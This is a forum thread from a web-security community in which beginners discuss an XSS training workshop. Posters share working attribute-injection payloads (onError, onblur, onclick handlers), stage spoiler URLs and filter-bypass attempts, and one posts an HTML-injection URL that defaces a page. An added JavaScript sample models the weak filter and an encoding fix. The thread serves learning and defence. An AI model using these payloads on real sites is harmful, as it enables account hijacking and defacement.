Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: XSS bootcamp
Posted by: hur
Date: February 05, 2008 01:04PM

Hi, I'm new to XSS. You gave the site; I tried but it didn't work, or maybe I worked it wrong. Could you help me with how to do this workshop? I just put the code in the textbox and then press the button, but I didn't get any message.

Re: XSS bootcamp
Posted by: DoctorDan
Date: February 05, 2008 03:27PM

@ hur
a place to start: http://www.w3schools.com/js/default.asp

Re: XSS bootcamp
Posted by: fragge
Date: February 19, 2008 08:52PM

pretty sure I just copied the decryption js, made my own page with the hidden form stream data and updated the form data for each page, running the script on my own machine.. cheat = win

on a more serious note - what the hell is with stage 3.. i feel like a retard :| (edit: wtf, as if a url injection counts? what is this, baby school... :Z) and now 6 won't fuck off with the double quote at the end of my injection (ie: <script>blahblah</script"> WHY WONT YOU LEAVE ME ALONE DOUBLE QUOTE I DON'T WANT TO USE ONBLUR. ><)

EDIT: Ok wtf? how does

">&lt;img src=. onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;

not return my error.. the injection is coming up as

<img src=. onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;">

on the page. Looks completely 100% fine to me.. it's just not executing my script. I've done this 1000 ways, none of them execute, they just LOOK correct. zz

edit (last): finally got the bitch.. was no different to my first attempts, it just started working. z z z z z



Edited 7 time(s). Last edit at 02/21/2008 09:47PM by fragge.

Re: Reiners
Posted by: Allen
Date: March 03, 2008 07:12PM

Many thanks here!
I've passed all the stages, and obtained a lot!
I'm an XSS novice.
I think it is a very good exchange platform here.

Re: XSS bootcamp
Posted by: hax0r
Date: May 30, 2008 03:58AM

SPOILER!!!
Stage 6










http://blogged-on.de/xss/6.maxsize.php?input=%22%20onblur=%22javascript:decipher(document.forms.cipher);%20alert(document.forms.cipher.stream.value);%20document.forms.cipher.stream.value%20=%20document.forms.cipher.stream_copy.value

Re: XSS bootcamp
Posted by: asilvermtzion
Date: June 27, 2008 11:20AM

any bright ideas on how to get past a regex filter on ":" (colon)? this makes any javascript:xxxx impossible.

Re: XSS bootcamp
Posted by: thrill
Date: June 27, 2008 11:29AM

Quote

any bright ideas on how to get past a regex filter on ":" (colon)? this makes any javascript:xxxx impossible.

Thank you for reviving this old topic, but please stick to your original thread and try bumping that up to see if you get other responses.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: XSS workshop for beginners
Posted by: hydra
Date: October 17, 2008 02:46PM

Hi w0ts0n

I am new to the XSS thing and stuck on stage 3, help me please :).

Re: XSS bootcamp
Posted by: awk
Date: November 24, 2008 08:51PM

Hello,
I am a newbie with XSS and have reached level 6, but cannot get beyond it.

From the description it seems that the script tags will be parsed out, and it is visible in the text reflected back on the screen. I have tried to use handlers like

http://blogged-on.de/xss/6.maxsize.php?input="onload="decipher(document.forms...."

which does not seem to work. Can someone please provide me with some idea as to how to get past this? I have also tried <scri"pt>, <scr<script>ipt> and some other variations but have not been successful.

There is a solution posted in this thread but that does not work either. Should I think about obfuscating the tags?

Thanks,
-A

Great Success!!

Re: XSS bootcamp
Posted by: thornmaker
Date: November 24, 2008 09:07PM

There might be an easier way to pass stage 6, but read about how .mario xssed this registration page for one such method

Re: XSS bootcamp
Posted by: awk
Date: November 24, 2008 09:29PM

thornmaker Wrote:
-------------------------------------------------------
> There might be an easier way to pass stage 6, but
> read about how .mario xssed this registration page
> for one such method


Thanks thornmaker, I tried out input=" onload=alert(1) a=" but got nowhere. I also tried out the name.xss link described in the post, and ended up at the "bad boy" page :-D .

I also went thru http://sla.ckers.org/forum/read.php?2,20942 , but still am a bit confused about how to get past this.

Thanks anyways,
-A

Re: XSS bootcamp
Posted by: thornmaker
Date: November 24, 2008 10:11PM

check out this list of html tags to see what events go with each html tag. Note that onload does not work in an input tag (for IE, FF, and Safari at least)

Re: XSS bootcamp
Posted by: awk
Date: November 25, 2008 02:02AM

wow! thanks.. it's a useful list :-)

However, I used the input= thingy because in the source html I can see the value passed to the backend has the name input. It's a param, and does not seem to correlate with an html tag.

Do correct me if I am mistaken.

I did try onmousemove etc.. but it makes no difference :-(

Thanks,
-A

Great Success!!

Re: XSS bootcamp
Posted by: Anonymous User
Date: November 25, 2008 07:12AM

Just replace onload in your example by onclick and click on the bloody input element ;)

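Why the stage 6 filter discussed above does not hold, as an added example that is not part of any poster's message or of the workshop's code: a constructed model in which script tags are stripped but the value is reflected into a quoted attribute of an input element, next to a version that HTML-encodes the value. All function names are hypothetical, and the probe string is the one quoted in the thread with onclick in place of onload.

```javascript
// Constructed model of the reflection discussed in the thread; every function
// name below is hypothetical and none of this is the workshop's own code.

// Weak filter: removes <script> tags only and leaves the double quote alone.
function stripScriptTags(s) {
  return s.replace(/<\/?script[^>]*>/gi, "");
}

// Vulnerable rendering: the filtered value goes straight into value="...".
function renderWeak(input) {
  return '<input type="text" name="input" value="' + stripScriptTags(input) + '">';
}

// Hardened rendering: encode every character that can end the attribute or
// start markup, so the whole input stays inside the quoted value.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function encodeAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}
function renderSafe(input) {
  return '<input type="text" name="input" value="' + encodeAttr(input) + '">';
}

// Minimal attribute scanner for one start tag: lists the attribute names an
// HTML parser would see. Enough for this demo, not a general HTML parser.
function attributeNames(tag) {
  const body = tag.replace(/^<\w+/, "").replace(/>$/, "");
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(body)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Any on* attribute in the rendered tag means user input escaped the value.
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => n.startsWith("on"));
}

// Probe taken from the thread (onclick swapped in as the later reply suggests).
const PROBE = '" onclick=alert(1) a="';
console.log(renderWeak(PROBE), hasEventHandler(renderWeak(PROBE)));
console.log(renderSafe(PROBE), hasEventHandler(renderSafe(PROBE)));
```

The script-tag filter passes its own test case yet the rendered tag still gains an attribute; with the value encoded, the scanner sees only type, name and value.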
Re: XSS bootcamp
Posted by: awk
Date: November 25, 2008 02:03PM

Thanks mario .. the solution was so in-the-face.. ughhh!

-A

Re: XSS bootcamp
Posted by: abo-ebrahem
Date: April 11, 2009 02:12PM

level 1
http://h4k.in/xssinexcess?title=%3C/title%3E%3Ccenter%3E%3Cb%3EHelo%20Admin%20Tried%20to%20increase%20the%20security%20of%20your%3Cbr%3EMessage%20by%20Abo-Ebrahem%3Cbr%3Ewww.7rs.org%3Cbr%3E



Edited 1 time(s). Last edit at 04/11/2009 03:56PM by abo-ebrahem.

Re: XSS bootcamp
Posted by: LoKuM
Date: October 22, 2009 02:45PM

Hi,

I'm completely new to XSS, but I want to learn everything about it.

All the workshop sites in this thread are down.

Can anyone tell me where I can find a good tutorial or ebook for an XSS beginner?
